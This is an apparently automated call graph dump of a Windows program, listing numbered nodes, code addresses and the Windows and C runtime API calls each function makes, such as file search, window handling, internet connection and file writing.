EnterCriticalSection 49841->49847 49842->49751 49842->49754 49843->49757 49844->49751 49845->49759 49846->49762 49847->49841 49853 a1b16b 38 API calls ___std_exception_copy 49848->49853 49850 a1b23e 49854 a1b24c 11 API calls std::locale::_Setgloballocale 49850->49854 49852 a1b24b 49853->49850 49854->49852 49855->49779 49856->49779 49857->49784 49859 862316 49858->49859 49860 862363 49858->49860 49863 862326 49859->49863 49894 84a720 40 API calls 4 library calls 49859->49894 49860->49789 49862 86235b 49862->49789 49863->49789 49864->49786 49865->49790 49866->49807 49868 91da0b 49867->49868 49869 91d94f 49867->49869 49870 a15d9a _ValidateLocalCookies 5 API calls 49868->49870 49869->49868 49871 84abe0 50 API calls 49869->49871 49872 91da5b 49870->49872 49873 91d95f 49871->49873 49872->49807 49874 91da63 49873->49874 49875 91d969 49873->49875 49876 84a8a0 2 API calls 49874->49876 49879 91d985 49875->49879 49884 91d993 49875->49884 49877 91da6d 49876->49877 49977 a15dd9 49877->49977 49881 84a190 47 API calls 49879->49881 49883 91d991 49881->49883 49896 861a20 49883->49896 49895 84a720 40 API calls 4 library calls 49884->49895 49885 91dc0a 49885->49807 49888 91d9d2 49889 861a20 112 API calls 49888->49889 49890 91d9f9 49889->49890 49890->49868 49891 91da0f LoadLibraryExW 49890->49891 49891->49868 49892->49811 49893->49804 49894->49862 49895->49883 49898 861a46 ___crtLCMapStringW 49896->49898 49907 861ab1 std::locale::_Locimp::_Locimp 49896->49907 49897 84a8a0 2 API calls 49899 861afc 49897->49899 49898->49907 49911 861a90 std::locale::_Setgloballocale 49898->49911 49996 84a6b0 38 API calls 49898->49996 49901 861b6b 49899->49901 49902 861b5e FindClose 49899->49902 49999 84a4f0 RtlAllocateHeap RaiseException 49901->49999 49902->49901 49904 861adf 49904->49888 49906 861b87 49909 84abe0 50 API calls 49906->49909 49907->49897 49907->49904 49908 861acd 49998 a1b21f 38 API calls ___std_exception_copy 49908->49998 49914 861b99 49909->49914 49911->49907 49997 a1b33f 11 API calls __Wcscoll 49911->49997 49912 861f4c 49913 84a8a0 2 API calls 49912->49913 49918 861f56 49913->49918 49914->49912 49915 861bc1 49914->49915 49916 861bcf 49914->49916 49919 84a190 47 API calls 49915->49919 50000 84a720 40 API calls 4 library calls 49916->50000 49921 86219c 49918->49921 49923 8621c0 49918->49923 49927 861fd5 49918->49927 49920 861bcd 49919->49920 49922 861e3c 49920->49922 49925 861c16 PathIsUNCW 49920->49925 49926 861d65 FindFirstFileW 49920->49926 49921->49888 49922->49888 49924 84a8a0 2 API calls 49923->49924 49928 8621ca 49924->49928 49929 861cf5 49925->49929 49930 861c2b 49925->49930 49926->49922 49931 861d7d GetFullPathNameW 49926->49931 49932 861ff2 49927->49932 50055 862420 40 API calls 49927->50055 50048 8552f0 52 API calls 4 library calls 49929->50048 50001 8552f0 52 API calls 4 library calls 49930->50001 49936 861d96 49931->49936 49976 861ed1 ___crtLCMapStringW 49931->49976 50056 862370 52 API calls 49932->50056 49939 861db1 GetFullPathNameW 49936->49939 50050 84a6b0 38 API calls 49936->50050 49937 861ffd 49941 861a20 104 API calls 49937->49941 49938 84a8a0 2 API calls 49938->49912 49943 861dca ___crtLCMapStringW 49939->49943 49944 862011 49941->49944 49945 861e76 49943->49945 49957 861dfe 49943->49957 49943->49976 49944->49921 49946 862044 PathIsUNCW 49944->49946 49959 861e88 _wcsrchr 49945->49959 50051 84a5a0 38 API calls 4 library calls 49945->50051 49948 862127 49946->49948 49949 862058 49946->49949 49947 861c33 49947->49926 50002 8556e0 49947->50002 50058 8552f0 52 API calls 4 library calls 49948->50058 50057 8552f0 52 API calls 4 library calls 49949->50057 49954 861cae 49958 862300 40 API calls 49954->49958 49956 861e34 SetLastError 49956->49922 49957->49956 49960 861e27 FindClose 49957->49960 49961 861cc1 49958->49961 49964 861ea8 _wcsrchr 49959->49964 50052 84a5a0 38 API calls 4 library calls 49959->50052 49960->49956 49961->49926 49963 861ce6 49961->49963 50049 8621d0 40 API calls 3 library calls 49963->50049 49965 861ed5 49964->49965 49966 861ebb 49964->49966 49965->49976 50054 84a5a0 38 API calls 4 library calls 49965->50054 49968 861f23 49966->49968 49966->49976 50053 84a5a0 38 API calls 4 library calls 49966->50053 49967 862060 49967->49921 49969 8556e0 97 API calls 49967->49969 49968->49922 49972 8620e1 49969->49972 49970 8620f3 49970->49921 50059 8621d0 40 API calls 3 library calls 49970->50059 49975 862300 40 API calls 49972->49975 49975->49970 49976->49938 49976->49968 49979 a15dde ___std_exception_copy 49977->49979 49978 91dbc2 49984 85e880 49978->49984 49979->49978 49981 a15dfa std::_Facet_Register 49979->49981 50065 a2b483 EnterCriticalSection std::_Facet_Register 49979->50065 50066 a17b2a 49981->50066 49983 a16c40 49985 85e89d 49984->49985 49995 85e917 std::ios_base::_Ios_base_dtor 49984->49995 49986 85e95d 49985->49986 49988 85e8b4 49985->49988 49989 85e8db 49985->49989 50069 848730 39 API calls 3 library calls 49986->50069 49988->49986 49992 a15dd9 std::_Facet_Register 2 API calls 49988->49992 49991 a15dd9 std::_Facet_Register 2 API calls 49989->49991 49993 85e8c5 49989->49993 49990 85e962 49991->49993 49992->49993 49994 a1b22f std::_Throw_Cpp_error 38 API calls 49993->49994 49993->49995 49994->49986 49995->49885 49996->49911 49997->49908 49998->49907 49999->49906 50000->49920 50001->49947 50003 855870 50002->50003 50009 855737 50002->50009 50004 84a8a0 2 API calls 50003->50004 50005 85587a 50004->50005 50008 84a8a0 2 API calls 50005->50008 50006 855759 50006->49954 50007 84abe0 50 API calls 50014 85579b 50007->50014 50010 855889 50008->50010 50009->50006 50009->50007 50009->50014 50011 84a8a0 2 API calls 50010->50011 50012 855893 50011->50012 50013 8558da 50012->50013 50025 85595d ___std_exception_copy 50012->50025 50015 8558e1 50013->50015 50016 85593f GetWindowLongW 50013->50016 50014->50005 50014->50010 50017 8557c3 50014->50017 50018 855b27 NtdllDefWindowProc_W 50015->50018 50020 855902 GetWindowLongW 50015->50020 50019 85594c 50016->50019 50017->50010 50026 855803 std::locale::_Setgloballocale 50017->50026 50029 855b49 ___std_exception_copy 50018->50029 50019->50018 50020->50018 50022 855918 GetWindowLongW SetWindowLongW NtdllDefWindowProc_W 50020->50022 50021 a15d9a _ValidateLocalCookies 5 API calls 50023 855b9e 50021->50023 50022->50029 50023->49954 50024 85581f std::locale::_Locimp::_Locimp 50024->49954 50028 8559db SetWindowTextW 50025->50028 50025->50029 50026->50024 50060 a1b33f 11 API calls __Wcscoll 50026->50060 50031 8559f7 50028->50031 50032 8559fd 50028->50032 50029->50021 50030 855841 50061 a1b21f 38 API calls ___std_exception_copy 50030->50061 50031->50032 50034 855a8b 50032->50034 50035 855a13 GlobalAlloc 50032->50035 50034->50029 50064 855e00 74 API calls 5 library calls 50034->50064 50035->50034 50036 855a23 GlobalLock 50035->50036 50040 855a38 std::locale::_Setgloballocale 50036->50040 50038 855abe 50041 855b37 50038->50041 50045 855ad7 SetWindowLongW 50038->50045 50044 855a3d std::locale::_Locimp::_Locimp 50040->50044 50062 a1b33f 11 API calls __Wcscoll 50040->50062 50041->50029 50042 855a5b 50063 a1b21f 38 API calls ___std_exception_copy 50042->50063 50046 855a71 GlobalUnlock 50044->50046 50047 855aeb ___std_exception_copy 50045->50047 50046->50034 50047->50019 50048->49961 50049->49926 50050->49939 50051->49959 50052->49964 50053->49976 50054->49976 50055->49932 50056->49937 50057->49967 50058->49970 50059->49921 50060->50030 50061->50024 50062->50042 50063->50044 50064->50038 50065->49979 50067 a17b71 RaiseException 50066->50067 50068 a17b44 50066->50068 50067->49983 50068->50067 50069->49990 50080 a15673 EnterCriticalSection 50070->50080 50072 849fe0 FindResourceExW 50075 849fc7 50072->50075 50074 a15673 4 API calls 50074->50075 50075->50072 50075->50074 50076 84a015 50075->50076 50084 84a050 LoadResource LockResource SizeofResource 50075->50084 50076->49817 50076->49818 50077->49821 50078->49822 50079->49825 50081 a15695 50080->50081 50082 a1568c 50080->50082 50081->50075 50082->50081 50085 a15650 RtlAllocateHeap EnterCriticalSection RaiseException 50082->50085 50084->50075 50085->50081 50086->49834 50087 954bf0 50088 954c3b 50087->50088 50091 954c28 50087->50091 50096 9444c0 46 API calls 5 library calls 50088->50096 50090 954c45 50093 848860 38 API calls 50090->50093 50092 a15d9a _ValidateLocalCookies 5 API calls 50091->50092 50095 954c8a 50092->50095 50094 954c71 50093->50094 50094->50091 50096->50090 50097 95f970 50135 95e0c0 39 API calls 50097->50135 50099 95f9af 50136 871f40 39 API calls 50099->50136 50101 95f9c7 50137 849cc0 39 API calls 50101->50137 50103 95f9dd 50104 848860 38 API calls 50103->50104 50105 95f9ef 50104->50105 50106 95fc58 50105->50106 50107 95fa29 std::ios_base::_Ios_base_dtor std::locale::_Setgloballocale 50105->50107 50108 a1b22f std::_Throw_Cpp_error 38 API calls 50106->50108 50112 95fab2 50107->50112 50170 859260 51 API calls 50107->50170 50113 95fc5d 50108->50113 50110 95faea 50172 8481d0 50110->50172 50138 9689c0 50112->50138 50116 a1b22f std::_Throw_Cpp_error 38 API calls 50113->50116 50115 95fa83 50171 8480a0 39 API calls std::locale::_Locimp::_Locimp 50115->50171 50118 95fc62 50116->50118 50117 95fb21 50182 95e0c0 39 API calls 50117->50182 50120 8481d0 39 API calls 50118->50120 50123 95fcc9 50120->50123 50121 95fb35 50183 966840 57 API calls 5 library calls 50121->50183 50184 a17a05 50123->50184 50126 95fcdc 50127 848860 38 API calls 50129 95fc25 50127->50129 50128 95fbef std::ios_base::_Ios_base_dtor 50128->50127 50131 848860 38 API calls 50129->50131 50130 95fb55 std::ios_base::_Ios_base_dtor 50130->50113 50130->50128 50132 95fc37 50131->50132 50133 a15d9a _ValidateLocalCookies 5 API calls 50132->50133 50134 95fc52 50133->50134 50135->50099 50136->50101 50137->50103 50198 848750 50138->50198 50140 968a69 std::locale::_Setgloballocale 50141 968a9a LoadStringW 50140->50141 50142 968acd 50141->50142 50146 968b80 std::locale::_Setgloballocale 50141->50146 50143 8481d0 39 API calls 50142->50143 50145 968aee 50143->50145 50144 968bd5 LoadStringW 50144->50146 50147 968bec 50144->50147 50149 848860 38 API calls 50145->50149 50157 968b00 std::ios_base::_Ios_base_dtor 50145->50157 50146->50144 50213 968dc0 40 API calls 2 library calls 50146->50213 50150 8481d0 39 API calls 50147->50150 50149->50157 50151 968c0d 50150->50151 50154 848860 38 API calls 50151->50154 50151->50157 50152 968cc9 std::ios_base::_Ios_base_dtor 50156 a15d9a _ValidateLocalCookies 5 API calls 50152->50156 50153 968d08 50155 a1b22f std::_Throw_Cpp_error 38 API calls 50153->50155 50154->50157 50158 968d0d 50155->50158 50159 968d01 50156->50159 50157->50152 50157->50153 50160 968dae 50158->50160 50161 968d91 SysAllocStringLen 50158->50161 50162 968d49 50158->50162 50159->50110 50163 84a8a0 2 API calls 50160->50163 50164 968d4e CLSIDFromString SysFreeString 50161->50164 50165 968da4 50161->50165 50162->50164 50166 968db8 50163->50166 50167 a15d9a _ValidateLocalCookies 5 API calls 50164->50167 50168 84a8a0 2 API calls 50165->50168 50169 968d8d 50167->50169 50168->50160 50169->50110 50170->50115 50171->50112 50173 84825e 50172->50173 50176 8481e0 50172->50176 50215 8487b0 39 API calls std::_Throw_Cpp_error 50173->50215 50175 8481ed std::locale::_Locimp::_Locimp 50175->50117 50176->50175 50179 848750 39 API calls 50176->50179 50177 848263 50178 8481d0 39 API calls 50177->50178 50180 8482bf 50178->50180 50181 848235 std::locale::_Locimp::_Locimp 50179->50181 50180->50117 50181->50117 50182->50121 50183->50130 50216 a17a13 50184->50216 50186 a17a0a 50187 a17a12 50186->50187 50232 a2f4be EnterCriticalSection std::locale::_Setgloballocale 50186->50232 50187->50126 50189 a1f8c0 50190 a1f8cb 50189->50190 50233 a2f503 38 API calls 6 library calls 50189->50233 50192 a1f8d5 IsProcessorFeaturePresent 50190->50192 50197 a1f8f4 50190->50197 50194 a1f8e1 50192->50194 50234 a1b023 8 API calls 2 library calls 50194->50234 50196 a1f8fe 50235 a2165b 15 API calls std::locale::_Setgloballocale 50197->50235 50199 84879b 50198->50199 50200 84875b 50198->50200 50214 848730 39 API calls 3 library calls 50199->50214 50202 848764 50200->50202 50205 848786 50200->50205 50202->50199 50203 84876b 50202->50203 50208 a15dd9 std::_Facet_Register 2 API calls 50203->50208 50204 848796 50204->50140 50205->50204 50206 a15dd9 std::_Facet_Register 2 API calls 50205->50206 50209 848790 50206->50209 50207 a1b22f std::_Throw_Cpp_error 38 API calls 50210 8487a5 50207->50210 50211 848771 50208->50211 50209->50140 50211->50207 50212 84877a 50211->50212 50212->50140 50213->50146 50214->50211 50215->50177 50217 a17a1c 50216->50217 50218 a17a1f GetLastError 50216->50218 50217->50186 50236 a1abfd 6 API calls ___vcrt_FlsFree 50218->50236 50220 a17a34 50221 a17a53 50220->50221 50222 a17a99 SetLastError 50220->50222 50237 a1ac38 6 API calls ___vcrt_FlsFree 50220->50237 50221->50222 50222->50186 50224 a17a4d 50224->50221 50225 a17a57 50224->50225 50238 a28911 12 API calls __Wcscoll 50225->50238 50232->50189 50233->50190 50234->50197 50235->50196 50236->50220 50237->50224 50239 8770c0 50240 8770f2 50239->50240 50241 84abe0 50 API calls 50240->50241 50242 87712d 50241->50242 50243 877137 50242->50243 50244 877228 50242->50244 50247 877163 50243->50247 50248 877158 50243->50248 50245 84a8a0 2 API calls 50244->50245 50246 877232 50245->50246 50259 878e00 50246->50259 50367 84a720 40 API calls 4 library calls 50247->50367 50252 84a190 47 API calls 50248->50252 50250 87724e 50253 877161 CreateWindowExW SendMessageW SendMessageW 50252->50253 50368 857b30 27 API calls 50253->50368 50256 8771e7 50257 a15d9a _ValidateLocalCookies 5 API calls 50256->50257 50258 877224 50257->50258 50369 902260 43 API calls _ValidateLocalCookies 50259->50369 50261 878e37 SendMessageW 50370 902560 39 API calls 50261->50370 50264 878e68 50265 848860 38 API calls 50264->50265 50266 878e8b 50265->50266 50267 848860 38 API calls 50266->50267 50268 878e9a 50267->50268 50279 878f39 std::ios_base::_Ios_base_dtor 50268->50279 50377 902560 39 API calls 50268->50377 50270 878ee9 50276 848860 38 API calls 50270->50276 50271 878fb0 50272 8481d0 39 API calls 50271->50272 50275 878fe3 50272->50275 50273 848860 38 API calls 50273->50279 50274 848860 38 API calls 50277 878f7e 50274->50277 50378 8480a0 39 API calls std::locale::_Locimp::_Locimp 50275->50378 50278 878f02 50276->50278 50277->50271 50277->50274 50278->50279 50281 879494 50278->50281 50279->50273 50279->50277 50283 a1b22f std::_Throw_Cpp_error 38 API calls 50281->50283 50282 879008 50379 8480a0 39 API calls std::locale::_Locimp::_Locimp 50282->50379 50285 879499 50283->50285 50287 a1b22f std::_Throw_Cpp_error 38 API calls 50285->50287 50286 879017 50380 8480a0 39 API calls std::locale::_Locimp::_Locimp 50286->50380 50288 87949e 50287->50288 50289 a1b22f std::_Throw_Cpp_error 38 API calls 50288->50289 50291 8794a3 50289->50291 50293 a1b22f std::_Throw_Cpp_error 38 API calls 50291->50293 50292 879036 50381 8480a0 39 API calls std::locale::_Locimp::_Locimp 50292->50381 50303 8794a8 50293->50303 50295 879045 50296 8481d0 39 API calls 50295->50296 50298 879074 50296->50298 50297 8798a8 50397 a210ed 38 API calls ___std_exception_copy 50297->50397 50299 8481d0 39 API calls 50298->50299 50307 87909c std::ios_base::_Ios_base_dtor 50299->50307 50301 8798d3 50302 a15d9a _ValidateLocalCookies 5 API calls 50301->50302 50304 8798fc 50302->50304 50303->50297 50305 87956e 50303->50305 50306 87957b 50303->50306 50304->50250 50383 8476d0 50305->50383 50394 848fe0 39 API calls 50306->50394 50307->50285 50309 879132 std::ios_base::_Ios_base_dtor 50307->50309 50311 8481d0 39 API calls 50309->50311 50315 879190 50311->50315 50312 8791e5 std::ios_base::_Ios_base_dtor 50313 8481d0 39 API calls 50312->50313 50321 879257 std::ios_base::_Ios_base_dtor 50313->50321 50314 879575 50316 8481d0 39 API calls 50314->50316 50315->50288 50315->50312 50317 8795d4 50316->50317 50318 8481d0 39 API calls 50317->50318 50319 8795fc 50318->50319 50320 8481d0 39 API calls 50319->50320 50322 879624 50320->50322 50321->50291 50336 8792ed std::ios_base::_Ios_base_dtor 50321->50336 50371 9b4f20 50 API calls _ValidateLocalCookies 50322->50371 50325 879648 50372 9b2fa0 50325->50372 50326 87945d 50328 848860 38 API calls 50326->50328 50330 879479 50328->50330 50329 879657 50331 848860 38 API calls 50329->50331 50332 a15d9a _ValidateLocalCookies 5 API calls 50330->50332 50338 879669 std::ios_base::_Ios_base_dtor 50331->50338 50333 879490 50332->50333 50333->50250 50334 879741 std::ios_base::_Ios_base_dtor 50342 8481d0 39 API calls 50334->50342 50366 879870 50334->50366 50335 879902 50337 a1b22f std::_Throw_Cpp_error 38 API calls 50335->50337 50382 878880 40 API calls _ValidateLocalCookies 50336->50382 50341 879907 50337->50341 50338->50334 50338->50335 50339 879892 50396 848fe0 39 API calls 50339->50396 50340 879881 50343 8476d0 39 API calls 50340->50343 50345 879918 50341->50345 50398 87b3d0 39 API calls 50341->50398 50346 879790 50342->50346 50347 87988c 50343->50347 50345->50250 50349 8481d0 39 API calls 50346->50349 50350 848860 38 API calls 50347->50350 50352 8797b8 50349->50352 50350->50297 50351 879964 50351->50250 50353 8481d0 39 API calls 50352->50353 50354 8797e0 50353->50354 50395 9b4f20 50 API calls _ValidateLocalCookies 50354->50395 50356 879802 50357 879819 50356->50357 50358 848860 38 API calls 50356->50358 50359 848860 38 API calls 50357->50359 50358->50357 50360 87984c 50359->50360 50361 848860 38 API calls 50360->50361 50362 879858 50361->50362 50363 848860 38 API calls 50362->50363 50364 879864 50363->50364 50365 848860 38 API calls 50364->50365 50365->50366 50366->50339 50366->50340 50367->50253 50368->50256 50369->50261 50370->50264 50371->50325 50373 9b2fdf 50372->50373 50375 9b3023 50372->50375 50373->50329 50374 9b303b 50374->50329 50375->50374 50399 9b30f0 50375->50399 50377->50270 50378->50282 50379->50286 50380->50292 50381->50295 50382->50326 50384 8476f6 50383->50384 50385 84776f 50384->50385 50390 847701 50384->50390 50420 8487b0 39 API calls std::_Throw_Cpp_error 50385->50420 50386 84770d std::locale::_Locimp::_Locimp 50386->50314 50388 847774 50389 84779e 50388->50389 50392 848860 38 API calls 50388->50392 50389->50314 50390->50386 50391 848750 39 API calls 50390->50391 50393 84774c std::locale::_Locimp::_Locimp 50391->50393 50392->50388 50393->50314 50394->50314 50395->50356 50396->50347 50397->50301 50398->50351 50400 9b3156 50399->50400 50402 9b3174 50400->50402 50418 968dc0 40 API calls 2 library calls 50400->50418 50403 9b3196 50402->50403 50405 8481d0 39 API calls 50402->50405 50404 9b31ec std::ios_base::_Ios_base_dtor 50403->50404 50406 a1b22f std::_Throw_Cpp_error 38 API calls 50403->50406 50404->50374 50405->50403 50407 9b3272 50406->50407 50408 9b3319 50407->50408 50419 9b5340 40 API calls std::locale::_Locimp::_Locimp 50407->50419 50410 8481d0 39 API calls 50408->50410 50413 9b336e std::ios_base::_Ios_base_dtor 50408->50413 50410->50413 50411 9b34f8 std::ios_base::_Ios_base_dtor 50414 a15d9a _ValidateLocalCookies 5 API calls 50411->50414 50412 9b3535 50415 a1b22f std::_Throw_Cpp_error 38 API calls 50412->50415 50413->50411 50413->50412 50416 9b3531 50414->50416 50417 9b353a 50415->50417 50416->50374 50418->50402 50419->50408 50420->50388 50421 87bba0 50422 87bbb3 std::ios_base::_Ios_base_dtor 50421->50422 50427 a179cd 50422->50427 50425 87bbdb 50426 87bbc9 SetUnhandledExceptionFilter 50426->50425 50428 a17a05 __set_se_translator 49 API calls 50427->50428 50429 a179d6 50428->50429 50430 a17a05 __set_se_translator 49 API calls 50429->50430 50431 87bbbd 50430->50431 50431->50425 50431->50426 50432 99a010 ResetEvent InternetConnectW 50433 99a04f GetLastError 50432->50433 50434 99a0a2 SetEvent 50432->50434 50435 99a08d 50433->50435 50437 99a05c 50433->50437 50434->50435 50436 99a080 WaitForSingleObject 50436->50435 50436->50437 50437->50435 50437->50436 50438 a1336f 50464 a130cd 50438->50464 50440 a1337f 50441 a133dc 50440->50441 50452 a13400 50440->50452 50473 a1330d 6 API calls 2 library calls 50441->50473 50443 a133e7 RaiseException 50457 a135d5 50443->50457 50444 a134eb 50448 a135a7 50444->50448 50451 a13549 GetProcAddress 50444->50451 50445 a13478 LoadLibraryExA 50446 a134d9 50445->50446 50447 a1348b GetLastError 50445->50447 50446->50444 50449 a134e4 FreeLibrary 50446->50449 50450 a134b4 50447->50450 50461 a1349e 50447->50461 50476 a1330d 6 API calls 2 library calls 50448->50476 50449->50444 50474 a1330d 6 API calls 2 library calls 50450->50474 50451->50448 50453 a13559 GetLastError 50451->50453 50452->50444 50452->50445 50452->50446 50452->50448 50459 a1356c 50453->50459 50456 a134bf RaiseException 50456->50457 50459->50448 50475 a1330d 6 API calls 2 library calls 50459->50475 50460 a1358d RaiseException 50462 a130cd DloadAcquireSectionWriteAccess 6 API calls 50460->50462 50461->50446 50461->50450 50463 a135a4 50462->50463 50463->50448 50465 a130d9 50464->50465 50466 a130ff 50464->50466 50477 a13176 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 50465->50477 50466->50440 50468 a130de 50469 a130fa 50468->50469 50478 a1329f VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 50468->50478 50479 a13100 GetModuleHandleW GetProcAddress GetProcAddress 50469->50479 50472 a13348 50472->50440 50473->50443 50474->50456 50475->50460 50476->50457 50477->50468 50478->50469 50479->50472 50480 84aab0 50481 84aabc 50480->50481 50482 84aaf4 50480->50482 50481->50482 50483 84a8a0 2 API calls 50481->50483 50483->50482 50484 84ae30 50485 84ae8d 50484->50485 50486 84ae6f 50484->50486 50487 84ae82 50486->50487 50488 84ae94 50486->50488 50487->50485 50500 a13837 RaiseException Concurrency::cancel_current_task 50487->50500 50492 84b250 50488->50492 50493 84b289 50492->50493 50494 84b2ea 50492->50494 50501 84b440 50493->50501 50495 a15d9a _ValidateLocalCookies 5 API calls 50494->50495 50497 84b327 50495->50497 50497->50485 50504 84b477 50501->50504 50502 a15d9a _ValidateLocalCookies 5 API calls 50503 84b2b6 SendMessageW 50502->50503 50503->50494 50504->50502 50505 945500 50506 945537 50505->50506 50512 945577 50505->50512 50507 a162a2 4 API calls 50506->50507 50508 945541 50507->50508 50508->50512 50513 a1615a 41 API calls 50508->50513 50510 945563 50514 a16258 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 50510->50514 50513->50510 50514->50512 50515 84ab30 50516 84ab76 50515->50516 50517 84ab39 50515->50517 50517->50516 50519 84a960 50517->50519 50520 84a9a1 50519->50520 50521 84a989 50519->50521 50522 84a9c1 RtlReAllocateHeap 50520->50522 50523 84a9a8 50520->50523 50521->50516 50522->50516 50523->50516 50524 87bcf0 50527 87bd39 50524->50527 50525 87bd5e 50526 848860 38 API calls 50525->50526 50528 87bd6d 50526->50528 50527->50525 50587 84d520 39 API calls 3 library calls 50527->50587 50530 8481d0 39 API calls 50528->50530 50531 87bd91 50530->50531 50583 9b3540 50531->50583 50534 87be7d 50536 a1b22f std::_Throw_Cpp_error 38 API calls 50534->50536 50535 87bdde std::ios_base::_Ios_base_dtor 50537 87be13 LoadLibraryExW 50535->50537 50538 87be4f 50535->50538 50539 87be82 50536->50539 50537->50538 50540 87be25 GetProcAddress GetProcAddress GetProcAddress 50537->50540 50542 a15d9a _ValidateLocalCookies 5 API calls 50538->50542 50541 84abe0 50 API calls 50539->50541 50540->50538 50543 87beca 50541->50543 50544 87be77 50542->50544 50545 87bfe1 50543->50545 50549 87bed4 50543->50549 50546 84a8a0 2 API calls 50545->50546 50547 87bfeb 50546->50547 50548 84abe0 50 API calls 50547->50548 50550 87c023 50548->50550 50551 861a20 112 API calls 50549->50551 50552 87c11c 50550->50552 50557 84abe0 50 API calls 50550->50557 50553 87bf19 50551->50553 50554 84a8a0 2 API calls 50552->50554 50555 861a20 112 API calls 50553->50555 50556 87c126 50554->50556 50558 87bf28 50555->50558 50559 87c04a 50557->50559 50560 861a20 112 API calls 50558->50560 50559->50552 50564 84abe0 50 API calls 50559->50564 50561 87bf37 50560->50561 50562 87bf5b 50561->50562 50563 861a20 112 API calls 50561->50563 50566 8481d0 39 API calls 50562->50566 50565 87bf4c 50563->50565 50567 87c06e 50564->50567 50568 861a20 112 API calls 50565->50568 50569 87bf98 50566->50569 50567->50552 50570 84abe0 50 API calls 50567->50570 50568->50562 50571 87c099 50570->50571 50571->50552 50572 87c09d 50571->50572 50573 862300 40 API calls 50572->50573 50574 87c0bc 50573->50574 50575 862300 40 API calls 50574->50575 50576 87c0c7 50575->50576 50577 862300 40 API calls 50576->50577 50578 87c0d2 50577->50578 50579 862300 40 API calls 50578->50579 50580 87c0ef 50579->50580 50588 87df30 RtlAllocateHeap RaiseException 50580->50588 50582 87c0fb 50584 9b3587 50583->50584 50586 87bda4 50584->50586 50589 9b3630 50584->50589 50586->50534 50586->50535 50587->50525 50588->50582 50590 9b367f CreateFileW 50589->50590 50591 9b367d 50589->50591 50592 9b369f 50590->50592 50591->50590 50603 861990 50592->50603 50594 9b36ce std::locale::_Setgloballocale 50595 9b371a WriteFile 50594->50595 50596 9b3737 50594->50596 50595->50594 50595->50596 50597 9b3767 std::ios_base::_Ios_base_dtor 50596->50597 50600 9b37bd 50596->50600 50598 9b379b CloseHandle 50597->50598 50599 9b37a9 50597->50599 50598->50599 50599->50586 50601 a1b22f std::_Throw_Cpp_error 38 API calls 50600->50601 50602 9b37c2 50601->50602 50604 861a03 50603->50604 50605 8619a0 50603->50605 50620 847bb0 39 API calls std::_Throw_Cpp_error 50604->50620 50607 8619d6 50605->50607 50608 8619a8 50605->50608 50609 8619f2 50607->50609 50612 a15dd9 std::_Facet_Register 2 API calls 50607->50612 50610 861a08 50608->50610 50611 8619af 50608->50611 50609->50594 50621 848730 39 API calls 3 library calls 50610->50621 50614 a15dd9 std::_Facet_Register 2 API calls 50611->50614 50615 8619e0 50612->50615 50616 8619b5 50614->50616 50615->50594 50617 8619be 50616->50617 50618 a1b22f std::_Throw_Cpp_error 38 API calls 50616->50618 50617->50594 50619 861a12 50618->50619 50621->50616 50622 984bc0 50668 984ff0 RtlAllocateHeap RaiseException 50622->50668 50624 984c0d 50669 988310 97 API calls 50624->50669 50626 984c2f 50670 95bcc0 50626->50670 50629 862300 40 API calls 50639 984c51 50629->50639 50630 984cbb 50632 984f0a 50630->50632 50633 984ccf 50630->50633 50631 984f1e 50635 84a8a0 2 API calls 50631->50635 50634 84a8a0 2 API calls 50632->50634 50754 960050 101 API calls 3 library calls 50633->50754 50637 984f14 50634->50637 50638 984f28 50635->50638 50641 84a8a0 2 API calls 50637->50641 50639->50630 50639->50631 50753 862420 40 API calls 50639->50753 50640 984ce0 50643 861a20 112 API calls 50640->50643 50641->50631 50644 984cf1 50643->50644 50645 984d08 50644->50645 50646 84abe0 50 API calls 50644->50646 50645->50644 50647 984d15 50646->50647 50647->50637 50648 984d1f 50647->50648 50649 984d48 50648->50649 50650 984d3d 50648->50650 50755 949600 50649->50755 50652 84a190 47 API calls 50650->50652 50655 984d46 50652->50655 50653 984d52 _wcsrchr 50654 984d8c 50653->50654 50653->50655 50656 984da0 50654->50656 50680 984ff0 RtlAllocateHeap RaiseException 50654->50680 50655->50653 50655->50654 50767 95be30 40 API calls 3 library calls 50655->50767 50656->50654 50659 984d81 50660 861a20 112 API calls 50659->50660 50660->50654 50661 984db1 50665 984dbd ___std_exception_copy 50661->50665 50681 988600 50661->50681 50667 984e27 ___std_exception_copy 50665->50667 50768 9866e0 50665->50768 50668->50624 50669->50626 50671 95bd05 50670->50671 50672 84abe0 50 API calls 50671->50672 50674 95bd22 50671->50674 50673 95bd15 50672->50673 50673->50674 50675 95bd65 50673->50675 50855 946da0 50674->50855 50676 84a8a0 2 API calls 50675->50676 50678 95bd6f 50676->50678 50679 95bd4f 50679->50629 50680->50661 50682 988ea7 50681->50682 50698 98865a std::ios_base::_Ios_base_dtor 50681->50698 50684 a15d9a _ValidateLocalCookies 5 API calls 50682->50684 50683 84abe0 50 API calls 50683->50698 50686 984e10 50684->50686 50685 988ef3 50687 84a8a0 2 API calls 50685->50687 50686->50665 50719 988f10 50686->50719 50688 988efd 50687->50688 50689 988edf 50690 84a8a0 2 API calls 50689->50690 50691 988ee9 50690->50691 50692 84a8a0 2 API calls 50691->50692 50692->50685 50694 95bcc0 115 API calls 50695 9889b8 std::ios_base::_Ios_base_dtor std::locale::_Setgloballocale 50694->50695 50695->50694 50697 988a70 FindFirstFileW 50695->50697 50695->50698 50703 8481d0 39 API calls 50695->50703 50705 8476d0 39 API calls 50695->50705 50710 9a60e0 44 API calls 50695->50710 50712 988eda 50695->50712 50713 848860 38 API calls 50695->50713 50716 988e68 50695->50716 50717 988dde 50695->50717 50893 862420 40 API calls 50695->50893 50894 952130 41 API calls 3 library calls 50695->50894 50895 9529a0 39 API calls 3 library calls 50695->50895 50896 9a5f80 CloseHandle std::ios_base::_Ios_base_dtor 50695->50896 50697->50695 50699 988ac9 FindClose 50697->50699 50698->50683 50698->50685 50698->50689 50698->50691 50698->50695 50700 8481d0 39 API calls 50698->50700 50701 8476d0 39 API calls 50698->50701 50709 848860 38 API calls 50698->50709 50711 988d94 50698->50711 50698->50712 50879 952130 41 API calls 3 library calls 50698->50879 50880 9529a0 39 API calls 3 library calls 50698->50880 50881 9a60e0 50698->50881 50892 95ffb0 97 API calls _wcsrchr 50698->50892 50699->50695 50700->50698 50701->50698 50703->50695 50705->50695 50709->50698 50710->50695 50711->50717 50714 a1b22f std::_Throw_Cpp_error 38 API calls 50712->50714 50713->50695 50714->50689 50716->50682 50897 